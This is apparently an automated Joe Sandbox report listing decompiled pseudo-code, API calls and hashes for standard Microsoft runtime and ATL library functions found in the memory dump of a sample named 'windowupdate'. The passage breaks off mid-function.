                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressDeleteHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$RegDeleteKeyExA$m_hKey != 0
                      • API String ID: 588496660-3303359461
                      • Opcode ID: b40d8f1529bca76ebdd86cf6e88d1aed70f8c7742325188b89e3c4516987935e
                      • Instruction ID: c6cb4866d1d30fcb5227338107a5067fcffdb4582940c58fcbdbc773df818c30
                      • Opcode Fuzzy Hash: b40d8f1529bca76ebdd86cf6e88d1aed70f8c7742325188b89e3c4516987935e
                      • Instruction Fuzzy Hash: C631B135E40219FFC710EB99D886F9D7BB5EB45300F288198E509AB291D774AE80DBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00D33330(intOrPtr __ecx, void* __esi, void* _a4, char* _a8) {
                      				intOrPtr* _v8;
                      				struct HINSTANCE__* _v12;
                      				struct HINSTANCE__* _v16;
                      				void* _t21;
                      				long _t24;
                      				_Unknown_base(*)()* _t27;
                      				void* _t31;
                      				void* _t32;
                      				void* _t44;
                      				void* _t45;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if( *_v8 == 0) {
                      					__eflags =  *((intOrPtr*)(_v8 + 4));
                      					if(__eflags == 0) {
                      						L11:
                      						_t21 = 1;
                      						L12:
                      						return E00DC1520(_t21, _t44 - _t45 + 0xc);
                      					}
                      					_t24 = RegDeleteKeyA(_a4, _a8);
                      					__eflags = _t45 - _t45;
                      					_t21 = E00DC1520(_t24, __eflags);
                      					goto L12;
                      				}
                      				_v12 = E00DC1520(GetModuleHandleA("Advapi32.dll"), _t45 - _t45);
                      				_t49 = _v12;
                      				if(_v12 == 0) {
                      					_t32 = L00D84930(_t49, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x29c, 0, "%ls", L"hAdvAPI32 != 0");
                      					_t45 = _t45 + 0x18;
                      					if(_t32 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					_t27 = GetProcAddress(_v12, "RegDeleteKeyTransactedA");
                      					__eflags = _t45 - _t45;
                      					_v16 = E00DC1520(_t27, _t45 - _t45);
                      					__eflags = _v16;
                      					if(__eflags == 0) {
                      						goto L11;
                      					}
                      					_t31 = _v16(_a4, _a8, 0, 0,  *_v8, 0);
                      					__eflags = _t45 - _t45;
                      					_t21 = E00DC1520(_t31, __eflags);
                      				} else {
                      					_t21 = 1;
                      				}
                      			}














                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00D33362
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00D333B6
                      • RegDeleteKeyA.ADVAPI32(CCCCCCCC,CCCCCCCC), ref: 00D33403
                      Strings
                      • hAdvAPI32 != 0, xrefs: 00D33378
                      • %ls, xrefs: 00D3337D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00D33389
                      • Advapi32.dll, xrefs: 00D3335D
                      • RegDeleteKeyTransactedA, xrefs: 00D333AD
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressDeleteHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegDeleteKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 588496660-2197841288
                      • Opcode ID: 9b02ccc17bf6a598cff90e517bd17e5f6ad5aab2709797419c698182c9cb69dd
                      • Instruction ID: 1ae48c9126e667f0f9531a000c4e9dd044f84af53de912b76f86861161403086
                      • Opcode Fuzzy Hash: 9b02ccc17bf6a598cff90e517bd17e5f6ad5aab2709797419c698182c9cb69dd
                      • Instruction Fuzzy Hash: 87214C36E10219FFCB10AB99C94AF9EBB74AB44700F148198F505AB291D675DE80DBF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E00D466BA(void* __ecx, intOrPtr* _a4) {
                      				void* _v8;
                      				struct HINSTANCE__* _t4;
                      				intOrPtr* _t5;
                      				intOrPtr* _t11;
                      
                      				if( *0xf2021c == 0) {
                      					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
                      					_t15 = _t4;
                      					if(_t4 == 0 || E00D4697D(_t15, "AtlThunk_AllocateData", 0xf2020c) == 0 || E00D4697D(_t15, "AtlThunk_InitData", 0xf20210) == 0 || E00D4697D(_t15, "AtlThunk_DataToCode", 0xf20214) == 0 || E00D4697D(_t15, "AtlThunk_FreeData", 0xf20218) == 0) {
                      						_t5 = 0;
                      					} else {
                      						asm("lock or [eax], ecx");
                      						_t5 = _a4;
                      						 *0xf2021c = 1;
                      						__imp__DecodePointer( *_t5);
                      					}
                      					return _t5;
                      				} else {
                      					_t11 = _a4;
                      					__imp__DecodePointer( *_t11);
                      					return _t11;
                      				}
                      			}








                      APIs
                      • DecodePointer.KERNEL32(?,?,?,00D46BEE,00F20214,?,?,?,?,00D34D19), ref: 00D466CC
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00D46BEE,00F20214,?,?,?,?,00D34D19), ref: 00D466E1
                      • DecodePointer.KERNEL32(?), ref: 00D4675D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction ID: 642a9e4b8f618dae6885265a4e434551325ed7e89b0cc2ba3068357d55c15e81
                      • Opcode Fuzzy Hash: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction Fuzzy Hash: 55016531540315BFDA116B109D0BF8537945F13B59F0C0055BD46B62D3EAA1C90AEAB7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E00D4676A(void* __ecx, intOrPtr* _a4) {
                      				void* _v8;
                      				struct HINSTANCE__* _t4;
                      				intOrPtr* _t5;
                      				intOrPtr* _t11;
                      
                      				if( *0xf2021c == 0) {
                      					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
                      					_t15 = _t4;
                      					if(_t4 == 0 || E00D4697D(_t15, "AtlThunk_AllocateData", 0xf2020c) == 0 || E00D4697D(_t15, "AtlThunk_InitData", 0xf20210) == 0 || E00D4697D(_t15, "AtlThunk_DataToCode", 0xf20214) == 0 || E00D4697D(_t15, "AtlThunk_FreeData", 0xf20218) == 0) {
                      						_t5 = 0;
                      					} else {
                      						asm("lock or [eax], ecx");
                      						_t5 = _a4;
                      						 *0xf2021c = 1;
                      						__imp__DecodePointer( *_t5);
                      					}
                      					return _t5;
                      				} else {
                      					_t11 = _a4;
                      					__imp__DecodePointer( *_t11);
                      					return _t11;
                      				}
                      			}








                      APIs
                      • DecodePointer.KERNEL32(?,?,?,00D46B8C,00F2020C,?,?,00D34CBB), ref: 00D4677C
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,00000000,?,?,00D46B8C,00F2020C,?,?,00D34CBB), ref: 00D46791
                      • DecodePointer.KERNEL32(?), ref: 00D4680D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction ID: 6649d249e960bb592d8643ca54481f0d36467716a7b19a9ee862bf3b5b9f388b
                      • Opcode Fuzzy Hash: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction Fuzzy Hash: B7012571581315FFCA115B109C0BF8537945F03B49F0C4055BC46B72D3EAA1D90AEAB7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E00D468CA(void* __ecx, intOrPtr* _a4) {
                      				void* _v8;
                      				struct HINSTANCE__* _t4;
                      				intOrPtr* _t5;
                      				intOrPtr* _t11;
                      
                      				if( *0xf2021c == 0) {
                      					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
                      					_t15 = _t4;
                      					if(_t4 == 0 || E00D4697D(_t15, "AtlThunk_AllocateData", 0xf2020c) == 0 || E00D4697D(_t15, "AtlThunk_InitData", 0xf20210) == 0 || E00D4697D(_t15, "AtlThunk_DataToCode", 0xf20214) == 0 || E00D4697D(_t15, "AtlThunk_FreeData", 0xf20218) == 0) {
                      						_t5 = 0;
                      					} else {
                      						asm("lock or [eax], ecx");
                      						_t5 = _a4;
                      						 *0xf2021c = 1;
                      						__imp__DecodePointer( *_t5);
                      					}
                      					return _t5;
                      				} else {
                      					_t11 = _a4;
                      					__imp__DecodePointer( *_t11);
                      					return _t11;
                      				}
                      			}








                      APIs
                      • DecodePointer.KERNEL32(?,CCCCCCCC,?,00D46C96,00F20210,?,?,?,00D34CDF,?,?,?), ref: 00D468DC
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,CCCCCCCC,?,00D46C96,00F20210,?,?,?,00D34CDF,?,?,?), ref: 00D468F1
                      • DecodePointer.KERNEL32(?), ref: 00D4696D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction ID: 6af001dd96a5f9ce45fee0a9d2ec6bceb2f9497a9f976ea179a0070d88e24d44
                      • Opcode Fuzzy Hash: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction Fuzzy Hash: 50011232541315FBCE515B209C0AF8537A45B03746F0C0056B846A62D3DEF1D90AEAB7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E00D4681A(void* __ecx, intOrPtr* _a4) {
                      				void* _v8;
                      				struct HINSTANCE__* _t4;
                      				intOrPtr* _t5;
                      				intOrPtr* _t11;
                      
                      				if( *0xf2021c == 0) {
                      					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
                      					_t15 = _t4;
                      					if(_t4 == 0 || E00D4697D(_t15, "AtlThunk_AllocateData", 0xf2020c) == 0 || E00D4697D(_t15, "AtlThunk_InitData", 0xf20210) == 0 || E00D4697D(_t15, "AtlThunk_DataToCode", 0xf20214) == 0 || E00D4697D(_t15, "AtlThunk_FreeData", 0xf20218) == 0) {
                      						_t5 = 0;
                      					} else {
                      						asm("lock or [eax], ecx");
                      						_t5 = _a4;
                      						 *0xf2021c = 1;
                      						__imp__DecodePointer( *_t5);
                      					}
                      					return _t5;
                      				} else {
                      					_t11 = _a4;
                      					__imp__DecodePointer( *_t11);
                      					return _t11;
                      				}
                      			}








                      APIs
                      • DecodePointer.KERNEL32(?,CCCCCCCC,?,00D46C3D,00F20218,?,?,?,00D44C21), ref: 00D4682C
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,CCCCCCCC,?,00D46C3D,00F20218,?,?,?,00D44C21), ref: 00D46841
                      • DecodePointer.KERNEL32(?), ref: 00D468BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction ID: 9b4840535a97191d1b0fcdcfa524b84f106fe9dc5d71a823199a0351a2073fdc
                      • Opcode Fuzzy Hash: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction Fuzzy Hash: 02011E31681315BBCE115B11AC0AF863B949F03745F0C0066BC46A62D7EAA1D91EEAB7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D571F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                      				intOrPtr _v8;
                      				char _v16;
                      				char _v24;
                      				intOrPtr _v28;
                      				char _v32;
                      				char _v40;
                      				signed int _t46;
                      				char* _t47;
                      				char* _t60;
                      				void* _t77;
                      				char* _t102;
                      				char* _t106;
                      				void* _t112;
                      				void* _t113;
                      
                      				_t113 = __esi;
                      				_t112 = __edi;
                      				_t77 = __ebx;
                      				_t46 = _a16;
                      				_v32 =  *((intOrPtr*)(0xdc8c88 + _t46 * 8));
                      				_v28 =  *((intOrPtr*)(0xdc8c8c + _t46 * 8));
                      				_t47 =  *0xf20640; // 0x0
                      				if( *_t47 == 0) {
                      					E00D4F350( &_v16, 1);
                      					E00D4FCA0( &_v16,  &_v32);
                      					if(E00D5A560(_a8) == 0) {
                      						E00D4FD40( &_v16, _a8);
                      					}
                      					if(E00D5A560(_a12) == 0) {
                      						if(E00D5A560(_a8) == 0) {
                      							E00D4FDE0( &_v16, 0x20);
                      						}
                      						E00D4FD40( &_v16, _a12);
                      					}
                      					E00D4F240(_a4,  &_v16);
                      					return _a4;
                      				}
                      				_t106 =  *0xf20640; // 0x0
                      				if( *_t106 < 0x36) {
                      					L3:
                      					_t60 =  *0xf20640; // 0x0
                      					if( *_t60 != 0x5f) {
                      						E00D53A20(_t77, _t112, _t113,  &_v40, _a12, _a16, _a8, 0);
                      						if(_a16 != 1) {
                      							_v8 = 0;
                      						} else {
                      							_v8 = 1;
                      						}
                      						E00D56F40(_t77, _t112, _t113, _a4,  &_v40, _v8);
                      						return _a4;
                      					}
                      					L4:
                      					E00D4F1F0( &_v24,  &_v32);
                      					if(E00D5A560(_a8) == 0 && (E00D5A560(_a12) != 0 || E00D5A600(_a12) == 0)) {
                      						E00D4FD40( &_v24, _a8);
                      					}
                      					if(E00D5A560(_a12) == 0) {
                      						E00D4FD40( &_v24, _a12);
                      					}
                      					E00D55490(_t77, _t112, _t113, _a4,  &_v24);
                      					return _a4;
                      				}
                      				_t102 =  *0xf20640; // 0x0
                      				if( *_t102 <= 0x39) {
                      					goto L4;
                      				}
                      				goto L3;
                      			}


















                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: EmptyName::is$MailboxNameName::Name::operator+=
                      • String ID:
                      • API String ID: 2270187897-0
                      • Opcode ID: 9043d448c590c13b00e6ffe1a7cf3e1c4d1a10e5fd79618c2dfdfe7403e10e6b
                      • Instruction ID: 0676d7d6efeea194b2d4421519f1920111c0de6e1cbf2ccaaba1a6b04562336f
                      • Opcode Fuzzy Hash: 9043d448c590c13b00e6ffe1a7cf3e1c4d1a10e5fd79618c2dfdfe7403e10e6b
                      • Instruction Fuzzy Hash: 6A410A71A042099BCF18EF94E991DEE7775EF54302F248168FD269B251EB30AE08CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D58500(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                      				signed int _v5;
                      				char _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				char _v96;
                      				char _v140;
                      				char _v184;
                      				intOrPtr _t41;
                      				signed int _t50;
                      				void* _t59;
                      				signed int _t61;
                      				signed int _t71;
                      				intOrPtr _t73;
                      				signed int _t91;
                      				signed int _t94;
                      				signed int _t95;
                      				intOrPtr _t96;
                      				signed int _t98;
                      				signed int _t102;
                      				signed int _t103;
                      
                      				_t106 = __esi;
                      				_t105 = __edi;
                      				_t66 = __ebx;
                      				_t94 =  *0xf20640; // 0x0
                      				if( *_t94 != 0x3f) {
                      					L2:
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				_t95 =  *0xf20640; // 0x0
                      				if( *((char*)(_t95 + (1 << 0))) == 0x24) {
                      					_t71 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t71 + 2;
                      					_t96 =  *0xf20634; // 0x0
                      					_v20 = _t96;
                      					_t41 =  *0xf20638; // 0x0
                      					_v24 = _t41;
                      					_t73 =  *0xf2063c; // 0x0
                      					_v28 = _t73;
                      					E00D4F5E0( &_v96);
                      					E00D4F5E0( &_v140);
                      					E00D4F5E0( &_v184);
                      					 *0xf20634 =  &_v96;
                      					 *0xf20638 =  &_v140;
                      					 *0xf2063c =  &_v184;
                      					E00D4F3F0( &_v16);
                      					_v5 = 0;
                      					_t98 =  *0xf20640; // 0x0
                      					__eflags =  *_t98 - 0x3f;
                      					if( *_t98 != 0x3f) {
                      						E00D4F820( &_v16, E00D5A1E0(__ebx, __edi, __esi,  &_v44, 1, 1));
                      					} else {
                      						_t91 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t91 + 1;
                      						E00D4F820( &_v16, E00D55E80(__ebx, __edi, __esi,  &_v36, 1,  &_v5));
                      					}
                      					_t50 = E00D5A560( &_v16);
                      					__eflags = _t50;
                      					if(_t50 != 0) {
                      						 *0xf2064c = 1;
                      					}
                      					__eflags = _v5 & 0x000000ff;
                      					if((_v5 & 0x000000ff) == 0) {
                      						E00D4FDE0( &_v16, 0x3c);
                      						E00D4FD40( &_v16, E00D58210(_t66, _t105, _t106, __eflags,  &_v52));
                      						_t59 = E00D55990( &_v16);
                      						__eflags = _t59 - 0x3e;
                      						if(_t59 == 0x3e) {
                      							E00D4FDE0( &_v16, 0x20);
                      						}
                      						E00D4FDE0( &_v16, 0x3e);
                      						__eflags = _a8 & 0x000000ff;
                      						if((_a8 & 0x000000ff) != 0) {
                      							_t61 =  *0xf20640; // 0x0
                      							__eflags =  *_t61;
                      							if( *_t61 != 0) {
                      								_t102 =  *0xf20640; // 0x0
                      								_t103 = _t102 + 1;
                      								__eflags = _t103;
                      								 *0xf20640 = _t103;
                      							}
                      						}
                      					}
                      					 *0xf20634 = _v20;
                      					 *0xf20638 = _v24;
                      					 *0xf2063c = _v28;
                      					E00D4F240(_a4,  &_v16);
                      					return _a4;
                      				}
                      				goto L2;
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: MailboxName::operator+=$EmptyIterator_baseIterator_base::_NameName::Name::isstd::_
                      • String ID:
                      • API String ID: 3761117093-0
                      • Opcode ID: 51a3f87a1a6cd0faad9903c9dc5e1cd5a09d186ea42d25a4bec96d7f50cadef8
                      • Instruction ID: 822153b1dfe8a752f31a517ec80d933f770e520940fa82bc8dac2fecce2525e0
                      • Opcode Fuzzy Hash: 51a3f87a1a6cd0faad9903c9dc5e1cd5a09d186ea42d25a4bec96d7f50cadef8
                      • Instruction Fuzzy Hash: A851B971D002189BDB24DF54EC91AEE7B75FB80301F144169EC156B6A3EF34AA49DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E00DB48F0(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				signed int _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				signed int _v92;
                      				char _v93;
                      				signed int _v100;
                      				char _v104;
                      				char _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				signed int _v120;
                      				signed int _v124;
                      				char _v136;
                      				char _v148;
                      				char _v160;
                      				char _v172;
                      				char _v184;
                      				char _v196;
                      				signed int _t163;
                      				signed int _t169;
                      				signed char _t173;
                      				signed int _t174;
                      				intOrPtr* _t177;
                      				intOrPtr _t185;
                      				signed int _t187;
                      				signed int _t189;
                      				intOrPtr* _t193;
                      				intOrPtr* _t196;
                      				intOrPtr* _t200;
                      				intOrPtr* _t205;
                      				intOrPtr* _t209;
                      				void* _t217;
                      				void* _t221;
                      				void* _t222;
                      				void* _t223;
                      				void* _t285;
                      				void* _t286;
                      				signed int _t287;
                      				void* _t288;
                      				void* _t289;
                      
                      				_t286 = __esi;
                      				_t285 = __edi;
                      				_t222 = __ebx;
                      				_t163 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t163 ^ _t287;
                      				if(_a12 != 0) {
                      					__eflags = _a8;
                      					if(_a8 == 0) {
                      						_v112 = 0;
                      					} else {
                      						_v112 = 1;
                      					}
                      					_v116 = _v112;
                      					__eflags = _v116;
                      					if(__eflags == 0) {
                      						_t221 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x26a, 0, L"%ls", L"buffer != nullptr");
                      						_t288 = _t288 + 0x18;
                      						__eflags = _t221 - 1;
                      						if(_t221 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					__eflags = _v116;
                      					if(_v116 != 0) {
                      						_v93 =  *((intOrPtr*)( *((intOrPtr*)(0xf21198 + (_a4 >> 6) * 4)) + 0x29 + (_a4 & 0x0000003f) * 0x38));
                      						__eflags = _v93 - 2;
                      						if(_v93 == 2) {
                      							L12:
                      							_t169 = _a12;
                      							__eflags = _t169 % 2;
                      							if(_t169 % 2 != 0) {
                      								_v120 = 0;
                      							} else {
                      								_v120 = 1;
                      							}
                      							_v124 = _v120;
                      							__eflags = _v124;
                      							if(__eflags == 0) {
